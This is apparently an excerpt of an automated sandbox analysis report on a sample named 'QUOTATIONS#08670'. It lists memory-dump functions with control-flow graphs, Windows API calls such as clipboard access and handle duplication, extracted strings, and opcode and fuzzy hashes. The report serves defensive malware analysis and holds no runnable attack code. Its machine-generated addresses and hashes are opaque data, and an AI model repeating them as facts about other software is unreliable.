                                                          control_flow_graph 0 6bead20-6bead3e 1 6bead40-6bead43 0->1 2 6bead57-6bead5a 1->2 3 6bead45-6bead52 1->3 4 6bead5c-6bead60 2->4 5 6bead6b-6bead6e 2->5 3->2 7 6beaf4c-6beaf56 4->7 8 6bead66 4->8 9 6bead78-6bead7b 5->9 10 6bead70-6bead75 5->10 8->5 11 6beaf3d-6beaf46 9->11 12 6bead81-6bead84 9->12 10->9 11->7 15 6beaddc-6beade5 11->15 13 6bead86-6beada2 12->13 14 6beada7-6beadaa 12->14 13->14 16 6beadac-6beadb5 14->16 17 6beadba-6beadbd 14->17 18 6beadeb-6beadef 15->18 19 6beaf57-6beaf8e 15->19 16->17 21 6beadbf-6beadd2 17->21 22 6beadd7-6beadda 17->22 23 6beadf4-6beadf6 18->23 30 6beaf90-6beaf93 19->30 21->22 22->15 22->23 25 6beadfd-6beae00 23->25 26 6beadf8 23->26 25->1 27 6beae06-6beae2a 25->27 26->25 46 6beaf3a 27->46 47 6beae30-6beae3f 27->47 31 6beb1fc-6beb1ff 30->31 32 6beaf99-6beafd4 30->32 34 6beb20e-6beb211 31->34 35 6beb201 call 6beb4dc 31->35 41 6beafda-6beafe6 32->41 42 6beb1c7-6beb1da 32->42 36 6beb21e-6beb221 34->36 37 6beb213-6beb21d 34->37 40 6beb207-6beb209 35->40 43 6beb232-6beb235 36->43 44 6beb223-6beb227 36->44 40->34 58 6beafe8-6beb001 41->58 59 6beb006-6beb04a 41->59 45 6beb1dc-6beb1dd 42->45 49 6beb258-6beb25a 43->49 50 6beb237-6beb253 43->50 44->32 48 6beb22d 44->48 45->31 46->11 60 6beae57-6beae92 call 6be65e8 47->60 61 6beae41-6beae47 47->61 48->43 51 6beb25c 49->51 52 6beb261-6beb264 49->52 50->49 51->52 52->30 56 6beb26a-6beb274 52->56 58->45 76 6beb04c-6beb05e 59->76 77 6beb066-6beb0a5 59->77 78 6beaeaa-6beaec1 60->78 79 6beae94-6beae9a 60->79 64 6beae4b-6beae4d 61->64 65 6beae49 61->65 64->60 65->60 76->77 84 6beb18c-6beb1a1 77->84 85 6beb0ab-6beb186 call 6be65e8 77->85 91 6beaed9-6beaeea 78->91 92 6beaec3-6beaec9 78->92 82 6beae9e-6beaea0 79->82 83 6beae9c 79->83 82->78 83->78 84->42 85->84 98 6beaeec-6beaef2 91->98 99 6beaf02-6beaf33 91->99 94 6beaecd-6beaecf 92->94 95 6beaecb 92->95 94->91 95->91 101 6beaef6-6beaef8 98->101 102 6beaef4 98->102 99->46 101->99 102->99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-2216122830
                                                          • Opcode ID: f14194f89c42cde6b6457c1a3913781f23059231ae2d6e5dbe28c61fcd0b88b8
                                                          • Instruction ID: b5ee6dd792698be695cfcf57d00a013432fdf63dbcdb2c559c4267cb9da87ebf
                                                          • Opcode Fuzzy Hash: f14194f89c42cde6b6457c1a3913781f23059231ae2d6e5dbe28c61fcd0b88b8
                                                          • Instruction Fuzzy Hash: 76E19E70E1020A8FDB65DF69D5806AEB7B6FF84304F208569E40AEB354DB35EC46CB81
                                                          Function 06BC9FE7 Relevance: 6.2, APIs: 4, Instructions: 150threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 255 6bc9fe7-6bca002 256 6bca005-6bca010 255->256 256->256 257 6bca012-6bca0b7 GetCurrentProcess 256->257 262 6bca0b9-6bca0bf 257->262 263 6bca0c0-6bca0f4 GetCurrentThread 257->263 262->263 264 6bca0fd-6bca131 GetCurrentProcess 263->264 265 6bca0f6-6bca0fc 263->265 266 6bca13a-6bca155 call 6bca1f8 264->266 267 6bca133-6bca139 264->267 265->264 271 6bca15b-6bca18a GetCurrentThreadId 266->271 267->266 272 6bca18c-6bca192 271->272 273 6bca193-6bca1f5 271->273 272->273
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA0A6
                                                          • GetCurrentThread.KERNEL32 ref: 06BCA0E3
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA120
                                                          • GetCurrentThreadId.KERNEL32 ref: 06BCA179
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 489984cbd363f15616b0b4125995c6868dde2d5d14be9a450e9fe56ebcbad0ea
                                                          • Instruction ID: cc153f9744e8a4d697bb2c70fa5339695d26e6435492ff3b7a611653574592fd
                                                          • Opcode Fuzzy Hash: 489984cbd363f15616b0b4125995c6868dde2d5d14be9a450e9fe56ebcbad0ea
                                                          • Instruction Fuzzy Hash: 306198B19013098FDB54DFA9D988B9EBBF1FF48304F24C09DD019AB2A0E7349945CB66
                                                          Function 06BCA028 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 280 6bca028-6bca0b7 GetCurrentProcess 284 6bca0b9-6bca0bf 280->284 285 6bca0c0-6bca0f4 GetCurrentThread 280->285 284->285 286 6bca0fd-6bca131 GetCurrentProcess 285->286 287 6bca0f6-6bca0fc 285->287 288 6bca13a-6bca155 call 6bca1f8 286->288 289 6bca133-6bca139 286->289 287->286 293 6bca15b-6bca18a GetCurrentThreadId 288->293 289->288 294 6bca18c-6bca192 293->294 295 6bca193-6bca1f5 293->295 294->295
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA0A6
                                                          • GetCurrentThread.KERNEL32 ref: 06BCA0E3
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA120
                                                          • GetCurrentThreadId.KERNEL32 ref: 06BCA179
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: c4c3ffca1a963695400de213f77baa948213eb277461323f5c5b2f3ed70066ec
                                                          • Instruction ID: 30121b971b5be6a4499420129211289410378e5464cc048297035fbbcd83f38c
                                                          • Opcode Fuzzy Hash: c4c3ffca1a963695400de213f77baa948213eb277461323f5c5b2f3ed70066ec
                                                          • Instruction Fuzzy Hash: CF5155B09012098FDB94DFAAD948B9EBBF1FF48314F24845DE009BB3A0E7349944CB65
                                                          Function 06BE9198 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 302 6be9198-6be91bd 303 6be91bf-6be91c2 302->303 304 6be91c8-6be91dd 303->304 305 6be9a80-6be9a83 303->305 311 6be91df-6be91e5 304->311 312 6be91f5-6be920b 304->312 306 6be9aa9-6be9aab 305->306 307 6be9a85-6be9aa4 305->307 309 6be9aad 306->309 310 6be9ab2-6be9ab5 306->310 307->306 309->310 310->303 314 6be9abb-6be9ac5 310->314 315 6be91e9-6be91eb 311->315 316 6be91e7 311->316 319 6be9216-6be9218 312->319 315->312 316->312 320 6be921a-6be9220 319->320 321 6be9230-6be92a1 319->321 322 6be9224-6be9226 320->322 323 6be9222 320->323 332 6be92cd-6be92e9 321->332 333 6be92a3-6be92c6 321->333 322->321 323->321 338 6be92eb-6be930e 332->338 339 6be9315-6be9330 332->339 333->332 338->339 344 6be935b-6be9376 339->344 345 6be9332-6be9354 339->345 350 6be939b-6be93a9 344->350 351 6be9378-6be9394 344->351 345->344 352 6be93ab-6be93b4 350->352 353 6be93b9-6be9433 350->353 351->350 352->314 359 6be9435-6be9453 353->359 360 6be9480-6be9495 353->360 364 6be946f-6be947e 359->364 365 6be9455-6be9464 359->365 360->305 364->359 364->360 365->364
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q
                                                          • API String ID: 0-1171383116
                                                          • Opcode ID: 737c719109d09b13af7de11781b91b6894fb2a6d496561f50aae2d77aea4e676
                                                          • Instruction ID: ee3c84c358961dbee803ad99a23b88744519807d02f89d382f6687caec2df08e
                                                          • Opcode Fuzzy Hash: 737c719109d09b13af7de11781b91b6894fb2a6d496561f50aae2d77aea4e676
                                                          • Instruction Fuzzy Hash: FB917B74B0020A9FDB54DF65D9507AEB3F2FF88300F1085A9C809EB398EB349C468B91
                                                          Function 06BECF90 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 368 6becf90-6becfab 369 6becfad-6becfb0 368->369 370 6becfbf-6becfc2 369->370 371 6becfb2-6becfb4 369->371 374 6bed00b-6bed00e 370->374 375 6becfc4-6bed006 370->375 372 6becfba 371->372 373 6bed479 371->373 372->370 378 6bed47c-6bed488 373->378 376 6bed057-6bed05a 374->376 377 6bed010-6bed052 374->377 375->374 380 6bed05c-6bed05e 376->380 381 6bed069-6bed06c 376->381 377->376 382 6bed48e-6bed77b 378->382 383 6bed26c-6bed27b 378->383 387 6bed337-6bed340 380->387 388 6bed064 380->388 384 6bed06e-6bed0b0 381->384 385 6bed0b5-6bed0b8 381->385 581 6bed9a2-6bed9ac 382->581 582 6bed781-6bed787 382->582 389 6bed27d-6bed282 383->389 390 6bed28a-6bed296 383->390 384->385 385->378 397 6bed0be-6bed0c1 385->397 395 6bed34f-6bed35b 387->395 396 6bed342-6bed347 387->396 388->381 389->390 392 6bed29c-6bed2ae 390->392 393 6bed9ad-6bed9e6 390->393 411 6bed2b3-6bed2b6 392->411 416 6bed9e8-6bed9eb 393->416 400 6bed46c-6bed471 395->400 401 6bed361-6bed375 395->401 396->395 402 6bed10a-6bed10d 397->402 403 6bed0c3-6bed105 397->403 400->373 401->373 419 6bed37b-6bed38d 401->419 406 6bed10f-6bed151 402->406 407 6bed156-6bed159 402->407 403->402 406->407 412 6bed15b-6bed171 407->412 413 6bed176-6bed179 407->413 421 6bed2ff-6bed302 411->421 422 6bed2b8-6bed2fa 411->422 412->413 423 6bed17b-6bed180 413->423 424 6bed183-6bed186 413->424 427 6beda1e-6beda21 416->427 428 6bed9ed-6beda19 416->428 450 6bed38f-6bed395 419->450 451 6bed3b1-6bed3b3 419->451 431 6bed304-6bed320 421->431 432 6bed325-6bed327 421->432 422->421 423->424 437 6bed1cf-6bed1d2 424->437 438 6bed188-6bed1ca 424->438 433 6beda44-6beda47 427->433 434 6beda23-6beda3f 427->434 428->427 431->432 445 6bed32e-6bed331 432->445 446 6bed329 432->446 447 6beda49 call 6bedb05 433->447 448 6beda56-6beda58 433->448 434->433 441 6bed21b-6bed21e 437->441 442 6bed1d4-6bed216 437->442 438->437 456 6bed267-6bed26a 441->456 457 6bed220-6bed22f 441->457 442->441 445->369 445->387 446->445 471 6beda4f-6beda51 447->471 460 6beda5f-6beda62 448->460 461 6beda5a 448->461 463 6bed399-6bed3a5 450->463 464 6bed397 450->464 476 6bed3bd-6bed3c9 451->476 456->383 456->411 468 6bed23e-6bed24a 457->468 469 6bed231-6bed236 457->469 460->416 472 6beda64-6beda73 460->472 461->460 474 6bed3a7-6bed3af 463->474 464->474 468->393 479 6bed250-6bed262 468->479 469->468 471->448 487 6bedada-6bedaef 472->487 488 6beda75-6bedad8 call 6be65e8 472->488 474->476 496 6bed3cb-6bed3d5 476->496 497 6bed3d7 476->497 479->456 508 6bedaf0 487->508 488->487 503 6bed3dc-6bed3de 496->503 497->503 503->373 507 6bed3e4-6bed400 call 6be65e8 503->507 520 6bed40f-6bed41b 507->520 521 6bed402-6bed407 507->521 508->508 520->400 523 6bed41d-6bed46a 520->523 521->520 523->373 583 6bed789-6bed78e 582->583 584 6bed796-6bed79f 582->584 583->584 584->393 585 6bed7a5-6bed7b8 584->585 587 6bed7be-6bed7c4 585->587 588 6bed992-6bed99c 585->588 589 6bed7c6-6bed7cb 587->589 590 6bed7d3-6bed7dc 587->590 588->581 588->582 589->590 590->393 591 6bed7e2-6bed803 590->591 594 6bed805-6bed80a 591->594 595 6bed812-6bed81b 591->595 594->595 595->393 596 6bed821-6bed83e 595->596 596->588 599 6bed844-6bed84a 596->599 599->393 600 6bed850-6bed869 599->600 602 6bed86f-6bed896 600->602 603 6bed985-6bed98c 600->603 602->393 606 6bed89c-6bed8a6 602->606 603->588 603->599 606->393 607 6bed8ac-6bed8c3 606->607 609 6bed8c5-6bed8d0 607->609 610 6bed8d2-6bed8ed 607->610 609->610 610->603 615 6bed8f3-6bed90c call 6be65e8 610->615 619 6bed90e-6bed913 615->619 620 6bed91b-6bed924 615->620 619->620 620->393 621 6bed92a-6bed97e 620->621 621->603
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q
                                                          • API String ID: 0-2441406858
                                                          • Opcode ID: 4b75f58b6518cf42d48a76a28226608a9f449f5238a1878469cd4df04c004ad6
                                                          • Instruction ID: 90aa94bcde492ea74d3b05bf7c88e05a84e0608d4e6a4b159365844ef6511c55
                                                          • Opcode Fuzzy Hash: 4b75f58b6518cf42d48a76a28226608a9f449f5238a1878469cd4df04c004ad6
                                                          • Instruction Fuzzy Hash: C6625E70A00206DFCB55EF68D590A5DBBB2FF84304B208A79D0069F769DB75ED4ACB81
                                                          Function 06BE4BB8 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 629 6be4bb8-6be4bdc 630 6be4bde-6be4be1 629->630 631 6be4be7-6be4cdf 630->631 632 6be52c0-6be52c3 630->632 652 6be4ce5-6be4d32 call 6be5460 631->652 653 6be4d62-6be4d69 631->653 633 6be52e4-6be52e6 632->633 634 6be52c5-6be52df 632->634 635 6be52ed-6be52f0 633->635 636 6be52e8 633->636 634->633 635->630 638 6be52f6-6be5303 635->638 636->635 666 6be4d38-6be4d54 652->666 654 6be4d6f-6be4ddf 653->654 655 6be4ded-6be4df6 653->655 672 6be4dea 654->672 673 6be4de1 654->673 655->638 669 6be4d5f 666->669 670 6be4d56 666->670 669->653 670->669 672->655 673->672
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fdq$XPdq$\Odq
                                                          • API String ID: 0-727959394
                                                          • Opcode ID: 4b119e7d6afb8ee9bf4e14beac0dfdf06ff957bc3a5f46caa404b90e5cd7c205
                                                          • Instruction ID: 6a8f4790e354f3d2d4b3b7420ce779eeaa1e310999a5b97a2cce9628eed8c8f6
                                                          • Opcode Fuzzy Hash: 4b119e7d6afb8ee9bf4e14beac0dfdf06ff957bc3a5f46caa404b90e5cd7c205
                                                          • Instruction Fuzzy Hash: 77619174F002099FEB549FA5C8147AEBBF2FB88700F20846AD506EB395DB758C45CB91
                                                          Function 06BEA3FA Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 930 6bea3fa-6bea3fd 931 6bea3ff-6bea401 930->931 932 6bea3b5 930->932 933 6bea3b9 931->933 934 6bea403-6bea428 931->934 932->933 936 6bea3ba-6bea3bd 933->936 935 6bea42a-6bea42d 934->935 937 6bea42f-6bea43d 935->937 938 6bea444-6bea447 935->938 939 6bea3df-6bea3e1 936->939 940 6bea3bf 936->940 941 6bea44d-6bea4e6 call 6be2080 937->941 956 6bea43f 937->956 938->941 942 6bea4f3-6bea4f6 938->942 943 6bea3e8-6bea3eb 939->943 944 6bea3e3 939->944 945 6bea3cb-6bea3da 940->945 951 6bea50c-6bea539 call 6be2080 941->951 989 6bea4e8-6bea4f2 941->989 946 6bea4f8-6bea502 942->946 947 6bea503-6bea506 942->947 948 6bea3ed-6bea3f1 943->948 949 6bea370-6bea373 943->949 944->943 945->939 947->951 952 6bea637-6bea63a 947->952 954 6bea395-6bea398 949->954 955 6bea375-6bea390 949->955 983 6bea53f-6bea564 951->983 984 6bea62c-6bea636 951->984 958 6bea63c-6bea655 952->958 959 6bea65a-6bea65d 952->959 954->936 960 6bea39a-6bea3b3 954->960 955->954 956->938 958->959 963 6bea65f-6bea67b 959->963 964 6bea680-6bea682 959->964 960->932 963->964 967 6bea689-6bea68c 964->967 968 6bea684 964->968 967->935 974 6bea692-6bea69b 967->974 968->967 991 6bea56e 983->991 992 6bea566-6bea56c 983->992 993 6bea574-6bea626 call 6be65e8 call 6be2080 991->993 992->993 993->983 993->984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: X!@$x!@
                                                          • API String ID: 0-2527372166
                                                          • Opcode ID: 7360e42aaa0bec4c3890b826805638290a8b7285d167839f1a5c5a52ae919660
                                                          • Instruction ID: 9897f953e80aca85ceb0afcedfe84453d920a7c419c95f10529eb080d27bfffd
                                                          • Opcode Fuzzy Hash: 7360e42aaa0bec4c3890b826805638290a8b7285d167839f1a5c5a52ae919660
                                                          • Instruction Fuzzy Hash: ED81CE71B002059FDB54EFA9E49069DB7B6EF88310F108579E50AEB355EB35AC468B80
                                                          Function 06BE918A Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1064 6be918a-6be91bd 1065 6be91bf-6be91c2 1064->1065 1066 6be91c8-6be91dd 1065->1066 1067 6be9a80-6be9a83 1065->1067 1073 6be91df-6be91e5 1066->1073 1074 6be91f5-6be920b 1066->1074 1068 6be9aa9-6be9aab 1067->1068 1069 6be9a85-6be9aa4 1067->1069 1071 6be9aad 1068->1071 1072 6be9ab2-6be9ab5 1068->1072 1069->1068 1071->1072 1072->1065 1076 6be9abb-6be9ac5 1072->1076 1077 6be91e9-6be91eb 1073->1077 1078 6be91e7 1073->1078 1081 6be9216-6be9218 1074->1081 1077->1074 1078->1074 1082 6be921a-6be9220 1081->1082 1083 6be9230-6be92a1 1081->1083 1084 6be9224-6be9226 1082->1084 1085 6be9222 1082->1085 1094 6be92cd-6be92e9 1083->1094 1095 6be92a3-6be92c6 1083->1095 1084->1083 1085->1083 1100 6be92eb-6be930e 1094->1100 1101 6be9315-6be9330 1094->1101 1095->1094 1100->1101 1106 6be935b-6be9376 1101->1106 1107 6be9332-6be9354 1101->1107 1112 6be939b-6be93a9 1106->1112 1113 6be9378-6be9394 1106->1113 1107->1106 1114 6be93ab-6be93b4 1112->1114 1115 6be93b9-6be9433 1112->1115 1113->1112 1114->1076 1121 6be9435-6be9453 1115->1121 1122 6be9480-6be9495 1115->1122 1126 6be946f-6be947e 1121->1126 1127 6be9455-6be9464 1121->1127 1122->1067 1126->1121 1126->1122 1127->1126
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q
                                                          • API String ID: 0-458585787
                                                          • Opcode ID: ff4063b24b9d814acf79898c2a8dc7bae8c25f68803489d4adc0b93426330f89
                                                          • Instruction ID: ccd207bde038291b9b88d234993f4f28e97e0059f126251a8b472dec38dd7ba0
                                                          • Opcode Fuzzy Hash: ff4063b24b9d814acf79898c2a8dc7bae8c25f68803489d4adc0b93426330f89
                                                          • Instruction Fuzzy Hash: 43514D74B101069FDB54DF74D990BAEB7F2EB88610F108579C40AEB399EB349C46CB91
                                                          Function 0146ED10 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26bb3e9831a7e41fd027c1b090cbdf201aceb1057b6e92d6bf5f717a304c68e2
                                                          • Instruction ID: 7e5b6e14cef64762dd6a0ce929743a473d6396dfd29ec49ea1fbf9b1e4fd38e0
                                                          • Opcode Fuzzy Hash: 26bb3e9831a7e41fd027c1b090cbdf201aceb1057b6e92d6bf5f717a304c68e2
                                                          • Instruction Fuzzy Hash: 14410F72E0034A8FDB04DFA9D80439EFBF5EF89310F15866AD505A7291DB34A845CBE1
                                                          Function 06BC64CE Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC65EA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 1f18291564dc4de453f7c47cf73f2519e9e4a47d6ae48504c9aafbee76db1798
                                                          • Instruction ID: aef8d1b630e638e6f76c453106bd1cd80d3493e801748f7ad353bf56d68ffccf
                                                          • Opcode Fuzzy Hash: 1f18291564dc4de453f7c47cf73f2519e9e4a47d6ae48504c9aafbee76db1798
                                                          • Instruction Fuzzy Hash: 3151CEB1D003099FDB14CF99C984ADEBBB2FF48310F24812EE919AB210E7759985CF90
                                                          Function 06BC64D8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC65EA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 7c7f2a16dc24c27393b0e7edb516fd7cac1c54a76e2f11b6185334e5c1ac7a6c
                                                          • Instruction ID: 240163b3701bca13cde3df11ab06086e72677b72e9fdf81194229d1a1fabf14a
                                                          • Opcode Fuzzy Hash: 7c7f2a16dc24c27393b0e7edb516fd7cac1c54a76e2f11b6185334e5c1ac7a6c
                                                          • Instruction Fuzzy Hash: 3441CEB1D003099FDB14CF9AC884ADEBBB5FF48310F24812EE919AB210D7719945CF90
                                                          Function 06BCAE80 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 06BCB5D9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5ffe9af03839855a3614e3e07a3591cb4f59da78c9b6fa53f0abb9a221667358
                                                          • Instruction ID: 43ad2f86a66f47969b79febbb8fcb0090a7b1aaf3ff71d2d97e577f40b2ea54a
                                                          • Opcode Fuzzy Hash: 5ffe9af03839855a3614e3e07a3591cb4f59da78c9b6fa53f0abb9a221667358
                                                          • Instruction Fuzzy Hash: 244128B59002098FDB54CF99C449AAEFBF5FB88324F248499D519A7321D335A940CBA0
                                                          Function 06BCBE60 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: 7ad19fd1e82d4884c031da61d962ad3ff4c14ca1614a7753545b63e47273df09
                                                          • Instruction ID: b5df861c37994d363d3330e72a149051edff8dfe2b6aea46fa9b874b5222a966
                                                          • Opcode Fuzzy Hash: 7ad19fd1e82d4884c031da61d962ad3ff4c14ca1614a7753545b63e47273df09
                                                          • Instruction Fuzzy Hash: 89311FB0D00209DFDB50CF99C985B9EBBF5EB08314F208099E008AB390D7B4AA44CFA5
                                                          Function 06BCBE5E Relevance: 1.6, APIs: 1, Instructions: 70comclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: f260796df4d2ae57cae9a0123a42bfd1a714b26d8bf51b53a9947c94df9de5af
                                                          • Instruction ID: 6fcdf67a945a71dd5f3d3d38ee37c4fd9588ab02bb6264d981e10d729fe6566b
                                                          • Opcode Fuzzy Hash: f260796df4d2ae57cae9a0123a42bfd1a714b26d8bf51b53a9947c94df9de5af
                                                          • Instruction Fuzzy Hash: B4311FB0D00209DFDB50CF98C984B9EBBF1AB08314F208099E008BB3A0D7749A45CF61
                                                          Function 06BCBCB8 Relevance: 1.6, APIs: 1, Instructions: 66comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 63c0d02497da550018f349094c994f3a46c6d022819351a993dc29f864cf2aba
                                                          • Instruction ID: e40a60014f92fd538319a183da44537cb07400acbac417cec038a6adccb81b6b
                                                          • Opcode Fuzzy Hash: 63c0d02497da550018f349094c994f3a46c6d022819351a993dc29f864cf2aba
                                                          • Instruction Fuzzy Hash: 48215CB18107888FCB60DFA9D64679EBFF4EF09324F14489ED449A7251C379A549CBA0
                                                          Function 06BCA270 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BCA2F7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 9c4b31f39fd8be920c8dd29638bc8d5f1a7f5d4da56e1ac6df51f901523f2863
